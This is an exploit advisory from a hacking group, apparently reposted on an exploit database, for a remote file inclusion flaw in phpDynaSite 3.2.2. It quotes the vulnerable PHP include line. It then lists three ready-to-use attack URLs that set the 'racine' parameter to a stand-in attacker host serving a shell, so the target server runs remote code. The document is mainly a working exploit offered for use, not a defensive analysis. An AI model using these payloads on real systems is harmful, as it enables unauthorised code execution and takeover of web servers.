id: 1114
date: 11/04/2006
title: phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities
author: DeltahackingTEAM
cves: 

=================================================================
phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities
=================================================================



**********************************************************************************************************
                                                    WwW.Deltahacking.NeT
                                                
**********************************************************************************************************

* dynasite3.2.2

* Class = Remote File Inclusion ;

* Found by = Dr.Pantagon 

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code

     include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  Dr.Torojan

**************************************************************************************************************


#  0day.today [2023-03-26]  #